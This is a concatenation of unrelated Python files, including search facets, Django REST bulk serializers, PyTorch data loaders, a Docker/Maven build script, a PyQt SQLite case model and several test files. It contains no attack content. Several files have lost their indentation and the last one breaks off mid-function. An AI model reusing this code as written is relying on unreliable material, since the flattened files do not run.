class FacetsParam(ParamInterpreter):
"""Evaluate facets."""
def iter_facet_args(self, params):
"""Iterate over all possible facet arguments."""
return {
k: v if type(v) is list else [v] for k, v in (params or {}).items()
}.items()
def iter_aggs_options(self, options):
"""Iterate over aggregation options."""
return options.get("aggs", {}).items()
def apply(self, identity, search, params):
"""Evaluate the query str on the search."""
options = self.config.search_facets_options
# Apply aggregations
for name, agg in self.iter_aggs_options(options):
# `aggs[]=` mutates `self.search`
search.aggs[name] = agg if not callable(agg) else agg()
# Apply post filters
post_filters = options.get("post_filters", {})
for name, facet_values in self.iter_facet_args(params):
filter_factory = post_filters.get(name)
if facet_values and filter_factory:
search = search.post_filter(filter_factory(facet_values))
return search
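# Illustrative configuration sketch, assuming the search object is an
# elasticsearch-dsl Search; the field and facet names below are hypothetical:
#
#   from elasticsearch_dsl import A, Q
#   search_facets_options = {
#       "aggs": {"type": A("terms", field="metadata.type")},
#       "post_filters": {
#           "type": lambda values: Q("terms", **{"metadata.type": values}),
#       },
#   }
#
# With params == {"type": "dataset"}, iter_facet_args yields ("type", ["dataset"]),
# so apply() registers the aggregation and adds the corresponding post filter.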
|
import json
import os
import sys
import argparse
parser = argparse.ArgumentParser(description='Process JSON config file.')
parser.add_argument('target', type=str, help='NER or KB target to set')
args = parser.parse_args()
with open('config.json', 'r') as f:
config = json.load(f)
ner_entries = []
kb_entries = []
for topic in config:
ner_entry = topic['name'] + '=' + topic['ner_model']
ner_entries.append(ner_entry)
kb_entry = topic['name'] + '=' + topic['kb_file']
kb_entries.append(kb_entry)
if args.target == 'ner':
    print(','.join(ner_entries).replace('/', r'\/'))
else:
    print(','.join(kb_entries).replace('/', r'\/'))
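# Illustrative input/output sketch; the topic names and paths are hypothetical.
# Given a config.json such as:
#   [{"name": "med", "ner_model": "models/med_ner", "kb_file": "kb/med.json"}]
# running the script with target 'ner' prints "med=models\/med_ner", and any
# other target prints "med=kb\/med.json" (slashes escaped, presumably for a
# later sed substitution).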
|
#!/usr/bin/python -tOO
import sys
if len(sys.argv) != 4:
    print('Usage : %s <interval (seconds)> <bsgfile> <tracefile> ' % sys.argv[0])
    sys.exit(1)
stopat = 4752000
interval = int(sys.argv[1])
bsgfile = sys.argv[2]
trace = sys.argv[3]
keysize = 16
trustedgroupsize = 10
completionfile = '../completion.%d.dat' % interval
print('''
all:
\trm -rf peerdata *.log
\t../testprotocol2 %s %s %d %d %d %d
\t../gather_log_info/completion.py authentication.log > %s \n\n''' % (bsgfile,
                                                                      trace,
                                                                      trustedgroupsize,
                                                                      keysize,
                                                                      interval,
                                                                      stopat,
                                                                      completionfile))
|
# this file shows how you could use load_extension to add games
# to your bot
# first, we make the bot
from discord.ext import commands
bot = commands.Bot("!") # Here, ! is the prefix
bot.load_extension("disgames")
# this would add a "Games" cog to your bot with all the games in it
|
from compas.datastructures import Network
from compas_plotters import Plotter
n = Network()
n.add_edge(1, 2)
n.add_edge(1, 3)
n.add_edge(1, 5)
n.add_edge(1, 7)
n.add_edge(2, 4)
n.add_edge(2, 6)
n.add_edge(2, 10)
n.add_edge(3, 6)
n.add_edge(3, 9)
n.add_edge(4, 8)
n.add_edge(5, 10)
print(n.summary())
visited = set()
def layout(node, y=1):
if node in visited:
return
visited.add(node)
nodes_in_row = list(n.nodes_where({"y": y}))
n.node_attributes(node, "xyz", [len(nodes_in_row), y, 0])
for nb in n.neighbors_out(node):
layout(nb, y + 1)
root = 1
layout(root)
plotter = Plotter(figsize=(12, 7.5))
artist = plotter.add(n)
artist.node_size = 2
# Workaround until this is merged: https://github.com/compas-dev/compas/pull/1029
artist._nodecollection.remove()
artist._edgecollection.remove()
artist._nodecollection = None
artist._edgecollection = None
artist.draw()
artist.draw_nodelabels(dict(zip(n.nodes(), n.nodes())))
plotter.zoom_extents()
plotter.show()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import mock
import unittest
import undelete as D
class HDXConnectionTest(unittest.TestCase):
'''Unit tests for checking the connection with HDX.'''
def test_connection_with_hdx(self):
a = "xxx"
b = "yyy"
assert D.collectDatasetDataFromHDX(dataset_id = a, apikey = b) == False
|
from __future__ import print_function, unicode_literals
import inspect
from rest_framework.exceptions import ValidationError
from rest_framework.fields import SkipField
from rest_framework.serializers import ListSerializer
from rest_framework.settings import api_settings
from rest_framework.utils import html
__all__ = [
'BulkListSerializer',
'BulkSerializerMixin',
]
class BulkSerializerMixin(object):
def to_internal_value(self, data):
ret = super(BulkSerializerMixin, self).to_internal_value(data)
id_attr = getattr(self.Meta, 'update_lookup_field', 'id')
request_method = getattr(self.context['request'], 'method', '')
# add update_lookup_field field back to validated data
# since super by default strips out read-only fields
# hence id will no longer be present in validated_data
if all((isinstance(self.root, BulkListSerializer),
id_attr,
request_method in ('PUT', 'PATCH'))):
id_field = self.fields[id_attr]
id_value = id_field.get_value(data)
ret[id_attr] = id_value
return ret
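# Illustrative usage sketch (the model and field names are hypothetical):
#
#   class BookSerializer(BulkSerializerMixin, serializers.ModelSerializer):
#       class Meta:
#           model = Book
#           fields = ('id', 'title')
#           list_serializer_class = BulkListSerializer
#
# With list_serializer_class set, BookSerializer(data=..., many=True) delegates
# to BulkListSerializer for bulk create/update, and the mixin keeps the `id`
# lookup field in validated_data for PUT/PATCH requests.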
class BulkListSerializer(ListSerializer):
update_lookup_field = 'id'
def update_or_create_instance(self, child, data, obj=None):
model_serializer = child.__class__(instance=obj, data=data,
context=self.context, partial=self.partial)
model_serializer.is_valid()
model_serializer.save()
return model_serializer.instance
def create(self, validated_data):
return [
self.update_or_create_instance(self.child, attrs)
for attrs in validated_data
]
def update(self, queryset, all_validated_data):
id_attr = getattr(self.child.Meta, 'update_lookup_field', 'id')
all_validated_data_by_id = {}
for i in all_validated_data:
key = i.get(id_attr)
if not (bool(key) and not inspect.isclass(key)):
raise ValidationError('')
all_validated_data_by_id[str(key)] = i
# since this method is given a queryset which can have many
# model instances, first find all objects to update
# and only then update the models
objects_to_update = queryset.filter(**{
'{}__in'.format(id_attr): list(all_validated_data_by_id.keys()),
})
if len(all_validated_data_by_id) != objects_to_update.count():
raise ValidationError('Could not find all objects to update.')
updated_objects = []
for obj in objects_to_update:
obj_id = str(getattr(obj, id_attr))
obj_validated_data = all_validated_data_by_id.get(obj_id)
# use model serializer to actually update the model
# in case that method is overwritten
updated_objects.append(
self.update_or_create_instance(self.child, obj_validated_data,
obj))
return updated_objects
def to_internal_value(self, data):
"""
List of dicts of native values <- List of dicts of primitive datatypes.
"""
if html.is_html_input(data):
data = html.parse_html_list(data, default=[])
if not isinstance(data, list):
message = self.error_messages['not_a_list'].format(
input_type=type(data).__name__
)
raise ValidationError({
api_settings.NON_FIELD_ERRORS_KEY: [message]
}, code='not_a_list')
if not self.allow_empty and len(data) == 0:
if self.parent and self.partial:
raise SkipField()
message = self.error_messages['empty']
raise ValidationError({
api_settings.NON_FIELD_ERRORS_KEY: [message]
}, code='empty')
ret = []
errors = []
for item in data:
try:
if self.instance:
try:
self.child.instance = self.instance.get(id=item['id'])
self.child.initial_data = item
except getattr(self.child.Meta.model, 'DoesNotExist') as exc:
raise ValidationError({'non_field_errors': [str(exc)]})
validated = self.child.run_validation(item)
except ValidationError as exc:
errors.append(exc.detail)
else:
ret.append(validated)
errors.append({})
if any(errors):
raise ValidationError(errors)
return ret
|
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask, current_app
from . import settings
from .main import main
def create_app(settings_override=None):
# Create application.
app = Flask(
import_name=__name__,
static_folder=settings.STATIC_DIR,
template_folder=settings.TEMPLATES_DIR
)
# Load configuration.
app.config.from_object(settings)
app.config.from_object(settings_override)
# Register blueprints.
app.register_blueprint(main)
# Configure logging.
if not app.config['TESTING']:
configure_logging(app)
return app
def configure_logging(app):
# Create a file handler and set its level to DEBUG.
file_handler = RotatingFileHandler(
app.config['LOG_FILE'],
maxBytes=10000,
backupCount=7
)
file_handler.setLevel(logging.DEBUG)
# Create a log formatter and set it to the file handler.
format_str = '[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s'
formatter = logging.Formatter(format_str, '%m-%d %H:%M:%S')
file_handler.setFormatter(formatter)
# Add the file handler to the logger.
app.logger.addHandler(file_handler)
# Set the logger's level to DEBUG.
app.logger.setLevel(logging.DEBUG)
def logger():
return current_app.logger
|
import random
import unittest
from numpy import random as np_random
from popgen import rhythm
class TestRhythm(unittest.TestCase):
def setUp(self):
self.rhythm = rhythm.Rhythm(120)
self.drum = self.rhythm.drum
def test_number_of_kicks_1(self):
random.seed(5)
assert self.rhythm.number_of_kicks() == 1
def test_number_of_kicks_2(self):
random.seed(3)
assert self.rhythm.number_of_kicks() == 2
def test_number_of_kicks_3(self):
random.seed(1)
assert self.rhythm.number_of_kicks() == 3
def test_generate_kicks(self):
random.seed(1)
np_random.seed(1)
kicks = (self.drum.bass_drum_1(), [(0, 4), (4, 4), (12, 8)])
assert self.rhythm.generate_kicks() == kicks
def test_generate_snares(self):
random.seed(1)
np_random.seed(1)
snares = (self.drum.acoustic_snare(), [(2, 8), (12, 4)])
assert self.rhythm.generate_snares() == snares
def test_generate_hihats(self):
random.seed(1)
np_random.seed(1)
hihats = (self.drum.pedal_hi_hat(), [(2, 8), (12, 4)])
assert self.rhythm.generate_hihats() == hihats
def test_generate_rides(self):
random.seed(1)
np_random.seed(1)
rides = (self.drum.ride_cymbal_1(), [(2, 8), (12, 4)])
assert self.rhythm.generate_rides() == rides
    def test_generate_bar(self):
random.seed(1)
np_random.seed(1)
bar = [[0.0, 4, [self.drum.bass_drum_1(), self.drum.pedal_hi_hat()]],
[0.0625, 16, None], [0.125, 16, None], [0.1875, 16, None],
[0.25, 4, [self.drum.bass_drum_1(), self.drum.ride_cymbal_1()]],
[0.3125, 16, None], [0.375, 16, None], [0.4375, 16, None],
[0.5, 4, [self.drum.acoustic_snare(), self.drum.ride_cymbal_1()]],
[0.5625, 16, None], [0.625, 16, None], [0.6875, 16, None],
[0.75, 8, [self.drum.bass_drum_1(), self.drum.pedal_hi_hat()]],
[0.8125, 16, None], [0.875, 16, None], [0.9375, 16, None]]
generated_bars = list(self.rhythm.generate_bar())
assert generated_bars == bar
|
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from PIL import Image, ImageDraw, ImageFont
import numpy as np
import glob
import os
import sys
sys.path.insert(0,'..')
import intersection
width = 500
height = 500
rec_width = 200
rec_height = 300
first_x = 50
second_x = first_x + rec_width + 10
counter = 0
while second_x > first_x:
print(counter)
image = Image.new( 'RGB', ( width, height ) )
draw = ImageDraw.Draw(image)
draw.rectangle ((0,0,width,height), fill = (255,255,255) )
font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf", 30)
IOU = round(intersection.IOU(first_x,100,rec_width,rec_height,second_x,100,rec_width,rec_height),3)
draw.text((first_x+rec_width/2,100+rec_height+10),"IOU="+str(IOU),fill=(0,0,0), font=font)
im = np.array( image )
# Create figure and axes
fig,ax = plt.subplots(1)
# Display the image
ax.imshow(im)
# Create a Rectangle patch
rect = patches.Rectangle((first_x,100),rec_width,rec_height,linewidth=1,edgecolor='r',facecolor='none')
# Add the patch to the Axes
ax.add_patch(rect)
rect = patches.Rectangle((second_x,100),rec_width,rec_height,linewidth=1,edgecolor='b',facecolor='none')
# Add the patch to the Axes
ax.add_patch(rect)
plt.axis('off')
plt.savefig('tmp'+str(counter).zfill(3))
plt.close()
second_x = second_x - 1
counter = counter + 1
fp_in = "tmp*.png"
fp_out = os.path.join("assets","iou_example.gif")
img, *imgs = [Image.open(f) for f in sorted(glob.glob(fp_in))]
img.save(fp=fp_out, format='GIF', append_images=imgs,save_all=True, duration=10, loop=0)
[os.remove(f) for f in sorted(glob.glob(fp_in))]
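# Worked example (assuming intersection.IOU computes the standard axis-aligned
# intersection over union): when the second 200x300 box is shifted 100 px to the
# right of the first, the overlap is 100*300 = 30000 px^2, the union is
# 2*200*300 - 30000 = 90000 px^2, and the annotated IOU is 30000/90000 = 0.333.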
|
import os
from project import app, db
class BaseConfig:
"""Base configuration"""
TESTING = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
print('Running through config')
class DevelopmentConfig(BaseConfig):
"""Development configuration"""
SQLALCHEMY_DATABASE_URI = os.environ.get('POSTGRES_URL')
MASTER_STATION = os.environ.get('MASTER_STATION')
MASTER_ELEVATOR = os.environ.get('MASTER_ELEVATOR')
MONGO_URI = os.environ.get('MONGO_URI')
MONGO_DBNAME = 'eva_dev'
class TestingConfig(BaseConfig):
"""Testing configuration"""
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_TEST_URL')
class ProductionConfig(BaseConfig):
"""Production configuration"""
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
|
import pytest
#from ..basevalidators import AngleValidator
from _plotly_utils.basevalidators import AngleValidator
import numpy as np
# Fixtures
# --------
@pytest.fixture()
def validator():
return AngleValidator('prop', 'parent')
# Tests
# -----
# ### Test acceptance ###
@pytest.mark.parametrize('val', [0] + list(np.linspace(-180, 179.99)))
def test_acceptance(val, validator):
assert validator.validate_coerce(val) == val
# ### Test coercion above 180 ###
@pytest.mark.parametrize('val,expected', [
(180, -180),
(181, -179),
(-180.25, 179.75),
(540, -180),
(-541, 179)
])
def test_coercion(val, expected, validator):
assert validator.validate_coerce(val) == expected
# ### Test rejection ###
@pytest.mark.parametrize('val',
['hello', (), [], [1, 2, 3], set(), '34'])
def test_rejection(val, validator):
with pytest.raises(ValueError) as validation_failure:
validator.validate_coerce(val)
assert 'Invalid value' in str(validation_failure.value)
|
import pytest
from hypothesis import given
from hypothesis.strategies import text
from pytest import approx
from squiggle import transform
def test_A():
assert (
transform("A", method="yau")
== transform("a", method="yau")
== ([0, 0.5], [0, -(3 ** 0.5) / 2])
)
def test_T():
assert (
transform("T", method="yau")
== transform("t", method="yau")
== ([0, 0.5], [0, (3 ** 0.5) / 2])
)
def test_G():
assert (
transform("G", method="yau")
== transform("g", method="yau")
== ([0, (3 ** 0.5) / 2], [0, -0.5])
)
def test_C():
assert (
transform("C", method="yau")
== transform("c", method="yau")
== ([0, (3 ** 0.5) / 2], [0, 0.5])
)
@given(text(alphabet="ATGC"))
def test_end_x_value(s):
assert transform(s, method="yau")[0][-1] == approx(
((3 ** 0.5) / 2 * (s.count("C") + s.count("G")))
+ (0.5 * (s.count("A") + s.count("T")))
)
@given(text(alphabet="ATGC"))
def test_end_y_value(s):
assert transform(s, method="yau")[1][-1] == approx(
(-(3 ** 0.5) / 2 * s.count("A"))
+ ((3 ** 0.5) / 2 * s.count("T"))
+ (0.5 * s.count("C"))
+ (-0.5 * s.count("G"))
)
def test_bad_seq():
with pytest.raises(ValueError):
transform("INVALID", method="yau")
|
"""
Inspired from APEX example at:
https://github.com/NVIDIA/apex/blob/master/examples/imagenet/main_amp.py#L256
and also from Timm loader at:
https://github.com/rwightman/pytorch-image-models/blob/master/timm/data/loader.py
"""
from types import SimpleNamespace
from typing import Callable, List, Optional, Any
import torch
from torch.utils.data import DataLoader
import torch.distributed as dist
import numpy as np
import random
from .enums import OutputFormat
def get_collate(image_format: OutputFormat,
label_format: OutputFormat,
other_fields_format: OutputFormat,
memory_format: torch.memory_format) -> Callable[[Any], SimpleNamespace]:
"""
Get the collate function.
Args:
image_format (OutputFormat): the output format for images.
label_format (OutputFormat): the output format for labels.
other_fields_format (OutputFormat): the output format for other fields.
memory_format (torch.memory_format): the data memory format for output
torch.Tensors.
Returns:
Callable, the collate function.
"""
return lambda batch: collate_function(batch,
image_format=image_format,
label_format=label_format,
other_fields_format=other_fields_format,
memory_format=memory_format)
def collate_function(batch: List[SimpleNamespace],
image_format: OutputFormat,
label_format: OutputFormat,
other_fields_format: OutputFormat,
memory_format: torch.memory_format) -> SimpleNamespace:
"""
    NOTE: the collate function can convert the types and shapes of the inputs
    following the OutputFormats, but it does not scale the values/range of the
    tensors/arrays. Since image inputs are uint8, the tensors/arrays will be in
    the range [0, 255] even if they are converted to floats.
Args:
batch (list[SimpleNamespace]): the input batch.
image_format (OutputFormat): the output format for images.
label_format (OutputFormat): the output format for labels.
other_fields_format (OutputFormat): the output format for other fields.
memory_format (torch.memory_format): the data memory format for output
torch.Tensors.
Returns:
a SimpleNamespace with collated fields.
"""
# get keys of SimpleNamespace
keys = batch[0].__dict__.keys()
batch_size = len(batch)
collate_dict = {}
for k in keys:
# take the correct output format
if k == "image":
channels_first, dtype, to_tensor = image_format.value
elif k == "label":
channels_first, dtype, to_tensor = label_format.value
else:
channels_first, dtype, to_tensor = other_fields_format.value
first_value = batch[0].__dict__[k]
# CASE INT
if isinstance(first_value, int) or isinstance(first_value, np.integer):
if to_tensor:
out_value = torch.tensor([sample.__dict__[k] for sample in batch],
dtype=dtype)
else:
out_value = np.array([sample.__dict__[k] for sample in batch],
dtype=dtype)
# CASE NDARRAY
elif isinstance(first_value, np.ndarray):
values = [sample.__dict__[k] for sample in batch]
shape = values[0].shape
if len(shape) == 3 and channels_first:
new_shape = (batch_size, shape[2], shape[0], shape[1])
else:
new_shape = tuple([batch_size] + list(shape))
if to_tensor:
out_value = torch.zeros(new_shape, dtype=dtype) \
.contiguous(memory_format=memory_format)
else:
out_value = np.zeros(shape=new_shape, dtype=dtype)
for i, value in enumerate(values):
if len(shape) == 3 and channels_first:
value = np.rollaxis(value, 2)
if to_tensor:
value = torch.from_numpy(value).to(dtype)
out_value[i] += value
# OTHER TYPES
else:
msg = f"Collate of targets {type(first_value)} not implemented!"
raise NotImplementedError(msg)
collate_dict[k] = out_value
return SimpleNamespace(**collate_dict)
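# Illustrative usage sketch; the OutputFormat member names are hypothetical,
# only their unpacking into (channels_first, dtype, to_tensor) is taken from the
# code above:
#
#   collate_fn = get_collate(image_format=OutputFormat.TENSOR_NCHW_FLOAT32,
#                            label_format=OutputFormat.TENSOR_INT64,
#                            other_fields_format=OutputFormat.NUMPY_INT64,
#                            memory_format=torch.contiguous_format)
#   loader = DataLoader(dataset, batch_size=32, collate_fn=collate_fn)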
class CpuLoader:
def __init__(self,
loader: DataLoader,
image_format: OutputFormat,
image_mean: Optional[tuple] = None,
image_std: Optional[tuple] = None,
scale_image_floats: Optional[bool] = True):
"""
Args:
            loader (torch.utils.data.Dataloader): the dataloader.
            image_format (OutputFormat): the output format for images.
            image_mean (tuple, optional): the mean to subtract (only from images).
            image_std (tuple, optional): the std to divide by (only for images).
            scale_image_floats (bool, optional): if True, image values are scaled
                from [0, 255] to [0, 1] (folded into the mean/std normalization).
"""
if "NCHW" not in image_format.name and "NHWC" not in image_format.name:
raise ValueError("Images should be in NCHW or NHWC format.")
if "TENSOR" not in image_format.name:
raise ValueError("Images should be Tensors for the CpuLoader.")
self.dtype = image_format.value[1]
assert self.dtype == torch.float16 or self.dtype == torch.float32, \
"OutputFormat for images should be float16 or float32!"
self.view = [1, 3, 1, 1] if "NCHW" in image_format.name else [1, 1, 1, 3]
# do we need to scale images?
self.scale = scale_image_floats
self.image_mean = image_mean
self.image_std = image_std
# do we need to normalize images?
self.normalize = self.image_mean is not None and self.image_std is not None
if self.scale:
if self.normalize:
self.image_mean = [x * 255. for x in self.image_mean]
self.image_std = [x * 255. for x in self.image_std]
else:
self.image_mean = [0., 0., 0.]
self.image_std = [255., 255., 255.]
# dataloader
self.dataloader = loader
self.sampler = loader.sampler
self.batch_sampler = loader.batch_sampler
self.dataset = loader.dataset
if self.scale or self.normalize:
self.image_mean = torch.tensor(self.image_mean).to(self.dtype)\
.view(self.view)
self.image_std = torch.tensor(self.image_std).to(self.dtype)\
.view(self.view)
def __iter__(self):
for batch in self.dataloader:
if self.normalize or self.scale:
batch.image = batch.image.to(self.dtype).sub_(self.image_mean)\
.div_(self.image_std)
else:
batch.image = batch.image.to(self.dtype)
yield batch
def __len__(self):
        return len(self.dataloader)
class CudaLoader:
"""
    A dataloader with prefetching that moves all data to the GPU.
    It can convert float32 to float16 and perform the normalization on the device.
"""
def __init__(self,
loader: DataLoader,
image_format: OutputFormat,
image_mean: Optional[tuple] = None,
image_std: Optional[tuple] = None,
scale_image_floats: Optional[bool] = True,
rank: Optional[int] = None):
"""
        Args:
            loader (torch.utils.data.DataLoader): the dataloader.
            image_format (OutputFormat): the output format of the images; must be
                a float16/float32 tensor format in NCHW or NHWC layout.
            image_mean (tuple, optional): the mean to subtract (images only).
            image_std (tuple, optional): the std to divide by (images only).
            scale_image_floats (bool, optional): whether uint8 images converted to
                float should be rescaled from the [0, 255] range.
            rank (int, optional): the local rank (device); defaults to the
                distributed rank, or 0 when torch.distributed is not initialized.
"""
if "NCHW" not in image_format.name and "NHWC" not in image_format.name:
raise ValueError("Images should be in NCHW or NHWC format.")
if "TENSOR" not in image_format.name:
raise ValueError("Images should be Tensors for the CudaLoader.")
self.dtype = image_format.value[1]
assert self.dtype == torch.float16 or self.dtype == torch.float32, \
"OutputFormat for images should be float16 or float32!"
self.view = [1, 3, 1, 1] if "NCHW" in image_format.name else [1, 1, 1, 3]
# do we need to scale images?
self.scale = scale_image_floats
self.image_mean = image_mean
self.image_std = image_std
# do we need to normalize images?
self.normalize = self.image_mean is not None and self.image_std is not None
if self.scale:
if self.normalize:
self.image_mean = [x * 255. for x in self.image_mean]
self.image_std = [x * 255. for x in self.image_std]
else:
self.image_mean = [0., 0., 0.]
self.image_std = [255., 255., 255.]
# dataloader
self.dataloader = loader
self.sampler = loader.sampler
self.batch_sampler = loader.batch_sampler
self.dataset = loader.dataset
# local rank
self.rank = rank
# if None get local rank
if self.rank is None:
try:
self.rank = dist.get_rank()
except Exception:
self.rank = 0
# send std and mean to local rank
if self.scale or self.normalize:
self.image_mean = torch.tensor(self.image_mean).to(self.dtype)\
.to(self.rank).view(self.view)
self.image_std = torch.tensor(self.image_std).to(self.dtype)\
.to(self.rank).view(self.view)
def __iter__(self):
stream = torch.cuda.Stream(device=self.rank)
first = True
for batch in self.dataloader:
next_input_dict = {}
with torch.cuda.stream(stream):
for k in batch.__dict__.keys():
next_input = batch.__dict__[k]
next_input = next_input.to(self.rank, non_blocking=True)
if k == "image":
if self.normalize or self.scale:
next_input = next_input.to(self.dtype).sub_(self.image_mean)\
.div_(self.image_std)
else:
next_input = next_input.to(self.dtype)
next_input_dict[k] = next_input
if not first:
yield SimpleNamespace(**input_dict)
else:
first = False
torch.cuda.current_stream().wait_stream(stream)
input_dict = next_input_dict.copy()
yield SimpleNamespace(**input_dict)
def __len__(self):
return len(self.dataloader)
def _worker_init(worker_id, worker_seeding='all'):
worker_info = torch.utils.data.get_worker_info()
assert worker_info.id == worker_id
if isinstance(worker_seeding, Callable):
seed = worker_seeding(worker_info)
random.seed(seed)
torch.manual_seed(seed)
np.random.seed(seed % (2 ** 32 - 1))
else:
assert worker_seeding in ('all', 'part')
# random / torch seed already called in dataloader iter class w/
# worker_info.seed to reproduce some old results (same seed + hparam combo),
# partial seeding is required (skip numpy re-seed)
if worker_seeding == 'all':
np.random.seed(worker_info.seed % (2 ** 32 - 1))
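# -----------------------------------------------------------------------------
# Minimal usage sketch (illustrative only, not part of the original module).
# It assumes that OutputFormat exposes members describing float32 NCHW image
# tensors and int64 label tensors; the member names used below
# (TENSOR_FLOAT32_NCHW, TENSOR_INT64) are hypothetical placeholders.
def _example_build_cpu_loader(dataset):
    collate = get_collate(
        image_format=OutputFormat.TENSOR_FLOAT32_NCHW,   # hypothetical member
        label_format=OutputFormat.TENSOR_INT64,          # hypothetical member
        other_fields_format=OutputFormat.TENSOR_INT64,   # hypothetical member
        memory_format=torch.contiguous_format)
    loader = DataLoader(dataset,
                        batch_size=32,
                        shuffle=True,
                        num_workers=4,
                        collate_fn=collate,
                        worker_init_fn=_worker_init)
    # Scale the uint8 range and normalize with ImageNet statistics.
    return CpuLoader(loader,
                     image_format=OutputFormat.TENSOR_FLOAT32_NCHW,  # hypothetical member
                     image_mean=(0.485, 0.456, 0.406),
                     image_std=(0.229, 0.224, 0.225),
                     scale_image_floats=True)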
|
#!/usr/bin/env python3
from os import cpu_count, getcwd, sched_setaffinity
from threading import Thread
from subprocess import Popen, DEVNULL, PIPE
# --------------------
# CONSTANTS
MAVEN = {
"CMD": ["./mvnw", "clean", "package", "-Dmaven.test.skip"],
"PROJECTS": [
["eureka", 8761, False],
["gateway", 8080, False],
["auth", 8081, False],
["users", 8082, True ],
["groups", 8083, True ],
["meetings", 8084, True ]
] # (service_name, service_port, needs_db)
}
DOCKER = {
"CMD": ["docker", "build", ".", "-f", "-"],
"TEMPLATES": {
"MAIN": """
FROM openjdk:17-alpine
COPY target/{service}-0.0.1.jar /app.jar
EXPOSE {port:d}
RUN adduser -D web && \\
chown web /app.jar && \\
chmod +x /app.jar
""",
"WITHOUT_DB": """
USER web
ENTRYPOINT ["java", "-jar", "/app.jar"]
""",
"WITH_DB": """
RUN echo -e "https://dl-cdn.alpinelinux.org/alpine/edge/main\\nhttps://dl-cdn.alpinelinux.org/alpine/edge/community" >> /etc/apk/repositories && \\
apk update && \\
apk add --no-cache postgresql14
USER postgres
RUN mkdir /var/lib/postgresql/data && \\
chmod 0700 /var/lib/postgresql/data && \\
initdb -D /var/lib/postgresql/data && \\
        sed -r "s/unix_socket_directories\\s*=\\s*'.*?'/unix_socket_directories='\\/tmp'/g" -i /var/lib/postgresql/data/postgresql.conf
USER root
RUN echo -e "su postgres -c 'pg_ctl start -D /var/lib/postgresql/data'\\nsu web -c 'java -jar /app.jar'" > /docker-entrypoint.sh && \\
chmod +x /docker-entrypoint.sh
ENTRYPOINT "/docker-entrypoint.sh"
"""
}
}
# --------------------
# FUNCTIONS
def build_microservice(service):
service_cwd = "{}/{}".format(getcwd(), service)
with Popen(MAVEN["CMD"], stdout=DEVNULL, stderr=DEVNULL, cwd=service_cwd, shell=False) as process:
print(f" ---->> Building '{service}' microservice jar...")
if process.wait() == 0:
print(f" ---->> Microservice jar '{service}' OK!")
return True
else:
print(f" ---->> Microservice jar '{service}' FAILED!")
return False
def build_dockerimage(service, port, db):
service_cwd = "{}/{}".format(getcwd(), service)
input_string = (DOCKER["TEMPLATES"]["MAIN"]).format(service = service, port = port)
input_string += DOCKER["TEMPLATES"]["WITH_DB"] if db is True else DOCKER["TEMPLATES"]["WITHOUT_DB"]
with Popen([*(DOCKER["CMD"]), "-t", f"brc/{service}:latest"], stdin=PIPE, stdout=DEVNULL, stderr=DEVNULL, cwd=service_cwd, shell=False) as process:
print(f" ---->> Building '{service}' docker image...")
process.communicate(str.encode(input_string))
if process.wait() == 0:
print(f" ---->> Docker image '{service}' OK!")
return True
else:
print(f" ---->> Docker image '{service}' FAILED!")
return False
def runnable(cpu_id, project):
sched_setaffinity(0, [ cpu_id ])
build_microservice(project[0]) and \
build_dockerimage(*project)
def main():
threads = []
host_cpus = cpu_count()
for idx, project in enumerate(MAVEN["PROJECTS"], start=0):
thread = Thread(target=runnable, args=[ (idx % host_cpus), project ])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
# --------------------
# MAIN
if __name__ == '__main__':
main()
|
from PyQt4 import QtGui
class CaseModel(QtGui.QStandardItemModel):
def __init__(self, parent, dbConnection):
super(CaseModel, self).__init__(parent)
self.dbCon = dbConnection
def populate(self):
cur = self.dbCon.cursor()
cur.execute("SELECT NAME FROM FCASE")
rows = cur.fetchall()
for row in rows:
item = QtGui.QStandardItem()
item.setEditable(False)
item.setText(row[0])
self.appendRow(item)
self.dbCon.commit()
def insertCase(self, name, description):
cur = self.dbCon.cursor()
cur.execute("INSERT INTO FCASE(NAME, DESCRIPTION) VALUES (?, ?)",
(str(name), str(description)))
self.dbCon.commit()
item = QtGui.QStandardItem()
item.setEditable(False)
item.setText(name)
self.appendRow(item)
def deleteCase(self, row, name):
cur = self.dbCon.cursor()
cur.execute("DELETE FROM FCASE WHERE NAME=?", (str(name),))
cur.execute("DELETE FROM IMAGE WHERE CASE_NAME=?", (str(name),))
cur.execute("SELECT NAME FROM MODULE")
rows = cur.fetchall()
all_modules = []
for r in rows:
all_modules.append(r[0])
for module in all_modules:
cur.execute("DELETE FROM " + module + "_MSG WHERE CASE_NAME=?", (str(name),))
self.dbCon.commit()
self.takeRow(row)
def fetchCaseDescription(self, name):
cur = self.dbCon.cursor()
cur.execute("SELECT DESCRIPTION FROM FCASE WHERE NAME = ?", (str(name),))
rows = cur.fetchall()
self.dbCon.commit()
return rows[0][0]
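# Illustrative wiring sketch (not part of the original module). It assumes a
# sqlite3 database that already contains the FCASE, IMAGE and MODULE tables
# used above; creating that schema is outside the scope of this model.
def _example_show_cases(db_path):
    import sys
    import sqlite3
    app = QtGui.QApplication(sys.argv)
    connection = sqlite3.connect(db_path)
    model = CaseModel(None, connection)
    model.populate()  # load the existing case names into the model
    view = QtGui.QListView()
    view.setModel(model)
    view.show()
    return app.exec_()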
|
"""
@author: gsivaraman@anl.gov
"""
def plot_metric_write(train_size,err_list,r2_list, err_unscaled ,r2_unscaled , indlist, tag=None):
'''
    Plot the metrics and write the evolution history of the trial to disk.
    :param train_size: (list)
    :param err_list: (list)
    :param r2_list: (list)
    :param err_unscaled: (list) Error rescaled to the energy scale
    :param r2_unscaled: (list)
    :param indlist: (list)
    :param tag: (str) String appended to the output file name
    Return type: figure object
'''
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
plt.rcParams["font.family"] = "Arial"
mpl.style.use('seaborn')
fig = plt.figure(figsize=(18.5,10.5),dpi=300)
ax1 = fig.add_subplot(211)
ax1.plot(train_size,err_list,'*--',color='r',lw=3.5)
ax1.set_ylabel('RMSE',fontsize=24)
ax1.set_xlabel('AL sample size',fontsize=24)
ax1.set_title("AL Evolution",fontsize=26)
ax1.tick_params(axis ='both', which ='major',
labelsize = 20)
ax1.tick_params(axis ='both', which ='minor', labelsize = 20)
